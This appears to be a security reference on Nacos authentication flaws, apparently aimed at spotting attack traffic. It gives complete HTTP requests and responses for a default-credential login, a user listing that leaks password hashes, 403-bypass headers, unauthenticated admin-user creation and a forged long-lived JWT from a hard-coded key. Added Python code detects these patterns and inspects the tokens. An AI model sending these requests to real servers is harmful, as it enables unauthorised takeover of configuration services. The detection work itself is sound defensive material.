Weak passwords
Default credentials
nacos/nacos
POST /nacos/v1/auth/users/login HTTP/1.1
Host: xxxx:8848
Connection: keep-alive
Content-Length: 29
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
username=nacos&password=nacos
Response
HTTP/1.1 200
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Set-Cookie: JSESSIONID=4C62C4A3A461080B84B1D4C93AD5FE56; Path=/nacos; HttpOnly
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcyNDA2NTkzNX0.lmLasuSrTflLJmiAuDvzy-QVN9LNNJKne7Nx4RYSo7c
Content-Type: application/json
Transfer-Encoding: chunked
Date: Mon, 19 Aug 2024 06:12:15 GMT
Keep-Alive: timeout=60
Connection: keep-alive
{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcyNDA2NTkzNX0.lmLasuSrTflLJmiAuDvzy-QVN9LNNJKne7Nx4RYSo7c","tokenTtl":18000,"globalAdmin":true,"username":"nacos"}
Characteristics
1. The endpoint is v1/auth/users/login, the request carries username and password, and the default port is 8848
2. A successful login returns status code 200 and the response contains Set-Cookie and accessToken
Unauthenticated credential disclosure
Request /nacos/v1/auth/users/?pageNo=1&pageSize=999 directly
Request
GET /nacos/v1/auth/users/?pageNo=1&pageSize=999 HTTP/1.1
Host: xxxx:8848
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Response
HTTP/1.1 200
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Type: application/json
Transfer-Encoding: chunked
Date: Sun, 18 Aug 2024 13:39:39 GMT
Keep-Alive: timeout=60
Connection: keep-alive
{"totalCount":2,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"username":"nacos","password":"$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu"},{"username":"Emo","password":"$2a$10$VwnJ2n1Ma5fUu2f4KmVMLON8eiDkjBcwA96FSeCkG0xljkYCyqkuG"}]}
If the response is 403 or the request otherwise fails, try:
1. Change the User-Agent header to Nacos-Server to bypass the check (worth trying whenever a Nacos vulnerability returns 403)
2. Add the request header serverIdentity: security
Characteristics
1. On successful disclosure the response body returns a pageItems list that contains the usernames and password hashes
2. The salted (bcrypt) password hashes start with $2a$10$
Unauthenticated user creation
ip:8848/nacos/v1/auth/users?username=root&password=root
POST /nacos/v1/auth/users? HTTP/1.1
Host: ip:8848
Connection: keep-alive
Content-Length: 32
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
REQUEST BODY:
username=root&password=12345678
#########################################################################################
HTTP/1.1 200
Content-Type: application/json;charset=UTF-8
Transfer-Encoding: chunked
Date: Tue, 20 Aug 2024 03:40:55 GMT
Keep-Alive: timeout=60
Connection: keep-alive
{"code":200,"message":null,"data":"create user ok!"}
Or put the username and password in the URL
POST /nacos/v1/auth/users/?username=root&password=root HTTP/1.1
Host: ip:8848
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Length: 0
REQUEST BODY:
-
#########################################################################################
HTTP/1.1 200
Content-Type: application/json;charset=UTF-8
Transfer-Encoding: chunked
Date: Thu, 15 Aug 2024 12:22:43 GMT
Keep-Alive: timeout=60
Connection: keep-alive
{"code":200,"message":null,"data":"create user ok!"}
There are also cases where the create user ok value appears in message rather than in data; this is probably a version difference
POST /nacos/v1/auth/users HTTP/1.1
Host: ip:8848
Content-Length: 31
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: ip:8848
Referer: ip1:8848/nacos/
Accept-Encoding: gzip, deflate
Connection: close
username=admin&password=admin
#########################################################################################
RESPONSE HEAD:
HTTP/1.1 200
Content-Type: application/json;charset=UTF-8
Transfer-Encoding: chunked
Date: Wed, 14 Aug 2024 09:54:33 GMT
Connection: close
RESPONSE BODY:
{"code":200,"message":"create user ok!","data":null}
A legitimate account-creation request carries authentication material such as a cookie or token
POST /nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0.00LxfkpzYpdVeojTfqMhtpPvNidpNcDoLU90MnHzA8Q HTTP/1.1
Host: ip:8848
Content-Length: 31
Accept: application/json, text/plain, */*
accessToken: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0.00LxfkpzYpdVeojTfqMhtpPvNidpNcDoLU90MnHzA8Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin:ip:8848
Referer: ip:8848/nacos/
Accept-Encoding: gzip, deflate
Connection: close
username=admin&password=admin1
#########################################################################################
HTTP/1.1 200
Content-Type: application/json;charset=UTF-8
Transfer-Encoding: chunked
Date: Wed, 14 Aug 2024 09:54:33 GMT
Connection: close
{"code":200,"message":"create user ok!","data":null}
Characteristics
1. The v1/auth/users endpoint exists and the response code is 200
2. A successful creation response contains create user ok
3. The request carries no accessToken field
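The three patterns above (default-credential login, unauthenticated user listing with the 403-bypass headers, and unauthenticated user creation) can be turned into detection logic over captured request/response pairs. The following is an added example, not code from the original page or from the Nacos project; the host address, cookie, hash and token values in the constructed samples are made up, and the finding tags are this example's own naming.

```python
# Added example (not from the original page): detection logic for the Nacos
# auth-API patterns described above, run over constructed request/response
# pairs. Host addresses, cookies, hashes and tokens below are made up.
import json
from urllib.parse import parse_qs, urlsplit

BCRYPT_PREFIX = "$2a$10$"            # hash prefix seen in leaked user lists
USERS_PATH = "/nacos/v1/auth/users"
LOGIN_PATH = USERS_PATH + "/login"


def parse_http(raw):
    """Split a raw HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body.strip()


def analyse_exchange(raw_request, raw_response):
    """Return a list of finding tags for one request/response pair."""
    req_line, req_h, req_body = parse_http(raw_request)
    status_line, resp_h, resp_body = parse_http(raw_response)
    method, target = req_line.split(" ")[:2]
    url = urlsplit(target)
    path = url.path.rstrip("/")
    query = parse_qs(url.query)
    form = parse_qs(req_body)
    status = int(status_line.split()[1])
    try:
        data = json.loads(resp_body) if resp_body else {}
    except json.JSONDecodeError:
        data = {}
    if not isinstance(data, dict):
        data = {}
    findings = []

    # 403-bypass headers named on the page
    if req_h.get("user-agent") == "Nacos-Server":
        findings.append("bypass-header:user-agent")
    if "serveridentity" in req_h:
        findings.append("bypass-header:serverIdentity")

    if path == LOGIN_PATH and method == "POST":
        creds = (form.get("username", [""])[0], form.get("password", [""])[0])
        if creds == ("nacos", "nacos"):
            findings.append("default-credential-attempt")
        if status == 200 and "accessToken" in data and "set-cookie" in resp_h:
            findings.append("login-success")

    elif path == USERS_PATH and method == "GET":
        items = data.get("pageItems") or []
        if status == 200 and items:
            hashes = [i for i in items if str(i.get("password", "")).startswith(BCRYPT_PREFIX)]
            findings.append(f"user-list-exposed:{len(items)}")
            findings.append(f"bcrypt-hashes-exposed:{len(hashes)}")

    elif path == USERS_PATH and method == "POST":
        # Legitimate creation carries a token (query or header) or a session cookie.
        authed = bool(query.get("accessToken")) or any(
            h in req_h for h in ("accesstoken", "authorization", "cookie"))
        created = status == 200 and "create user ok" in (
            str(data.get("data")) + str(data.get("message")))
        if created:
            user = (query.get("username") or form.get("username") or ["?"])[0]
            findings.append(("user-created:" if authed else "unauthenticated-user-created:") + user)
    return findings


# --- constructed samples, modelled on the captures above ---
REQ_LOGIN = ("POST /nacos/v1/auth/users/login HTTP/1.1\nHost: 192.0.2.10:8848\n"
             "Content-Type: application/x-www-form-urlencoded\n\nusername=nacos&password=nacos")
RESP_LOGIN = ("HTTP/1.1 200\nSet-Cookie: JSESSIONID=CONSTRUCTED; Path=/nacos; HttpOnly\n"
              "Content-Type: application/json\n\n"
              '{"accessToken":"eyJ.constructed.token","tokenTtl":18000,"globalAdmin":true,"username":"nacos"}')
REQ_LIST = ("GET /nacos/v1/auth/users/?pageNo=1&pageSize=999 HTTP/1.1\n"
            "Host: 192.0.2.10:8848\nUser-Agent: Nacos-Server\n\n")
RESP_LIST = ('HTTP/1.1 200\nContent-Type: application/json\n\n'
             '{"totalCount":1,"pageItems":[{"username":"nacos","password":"$2a$10$CONSTRUCTEDhash"}]}')
REQ_CREATE = ("POST /nacos/v1/auth/users?username=root&password=root HTTP/1.1\n"
              "Host: 192.0.2.10:8848\nContent-Length: 0\n\n")
RESP_CREATE = ('HTTP/1.1 200\nContent-Type: application/json;charset=UTF-8\n\n'
               '{"code":200,"message":null,"data":"create user ok!"}')


def run_samples():
    """Analyse the three constructed exchanges and return their findings."""
    return {
        "login": analyse_exchange(REQ_LOGIN, RESP_LOGIN),
        "list": analyse_exchange(REQ_LIST, RESP_LIST),
        "create": analyse_exchange(REQ_CREATE, RESP_CREATE),
    }


if __name__ == "__main__":
    for name, tags in run_samples().items():
        print(name, tags)
```

The user-creation rule keys on the page's third characteristic (no accessToken on the request) but also accepts an Authorization header or session cookie as proof of authentication, so a legitimate console session is reported as user-created rather than unauthenticated-user-created; both the `data` and `message` fields are checked because the page notes that the create user ok string moves between them across versions.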
Authentication bypass
In 0.1.0 <= Nacos <= 2.2.0 the token.secret.key value is hard-coded; a JWT constructed with that key grants direct access to the console
Characteristics
1. Successful exploitation shows as a request carrying an accessToken field and a response containing Set-Cookie
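Forged tokens do not look different on the wire, but the two accessToken values captured on this page show what a defender can inspect: the login token expires exactly tokenTtl (18000 s) after the response Date, while the token on the user-creation request has an exp claim of 9999999999, far beyond anything the server would issue. The following is an added example, not code from the original page or the Nacos project; it decodes the page's own tokens by hand, compares their lifetime with the server's tokenTtl, and optionally checks the HS256 signature against the key bytes the deployment actually uses (the key in the demo call is a constructed wrong value, so the check is expected to fail).

```python
# Added example (not from the original page): inspect the accessToken JWTs
# captured above. Decoding is done by hand so this runs without third-party
# libraries; the "wrong" key used in the demo call is constructed, the real
# token.secret.key is whatever the deployment configured.
import base64
import calendar
import hashlib
import hmac
import json
from email.utils import parsedate

# Tokens and Date headers copied from the captures on this page.
TOKEN_LOGIN = ("eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcyNDA2NTkzNX0."
               "lmLasuSrTflLJmiAuDvzy-QVN9LNNJKne7Nx4RYSo7c")
DATE_LOGIN = "Mon, 19 Aug 2024 06:12:15 GMT"
TOKEN_CREATE = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0."
                "00LxfkpzYpdVeojTfqMhtpPvNidpNcDoLU90MnHzA8Q")
DATE_CREATE = "Wed, 14 Aug 2024 09:54:33 GMT"
TOKEN_TTL = 18000  # tokenTtl returned by the login response above


def _b64url_decode(part):
    """Base64url decode with the padding JWTs strip off."""
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def decode_jwt(token):
    """Return (header, payload) dicts without verifying the signature."""
    header_b64, payload_b64, _ = token.split(".")
    return json.loads(_b64url_decode(header_b64)), json.loads(_b64url_decode(payload_b64))


def verify_hs256(token, key):
    """True only if the HS256 signature was produced with `key` (raw bytes)."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, _b64url_decode(sig_b64))


def token_lifetime(token, date_header):
    """Seconds from the response's Date header (GMT) to the token's exp claim."""
    _, payload = decode_jwt(token)
    issued = calendar.timegm(parsedate(date_header))
    return payload["exp"] - issued


def inspect_token(token, date_header, key=None, ttl=TOKEN_TTL, slack=60):
    """Summarise the signals a defender cares about for one token."""
    header, payload = decode_jwt(token)
    lifetime = token_lifetime(token, date_header)
    result = {
        "alg": header.get("alg"),
        "sub": payload.get("sub"),
        "lifetime": lifetime,
        # far longer than the server's own tokenTtl => not minted by this server's login
        "lifetime_suspicious": lifetime > ttl + slack,
    }
    if key is not None:
        result["signature_valid"] = verify_hs256(token, key)
    return result


if __name__ == "__main__":
    print(inspect_token(TOKEN_LOGIN, DATE_LOGIN))
    print(inspect_token(TOKEN_CREATE, DATE_CREATE, key=b"constructed-wrong-key"))
```

In a real deployment the `key` argument is the HMAC key bytes derived from the configured token.secret.key (as an assumption, pass them already decoded in whatever form the server uses); a token that verifies under the vendor's shipped default but not under a freshly generated key is the hard-coded-key bypass in action, and rotating that key is the fix the version range above calls for.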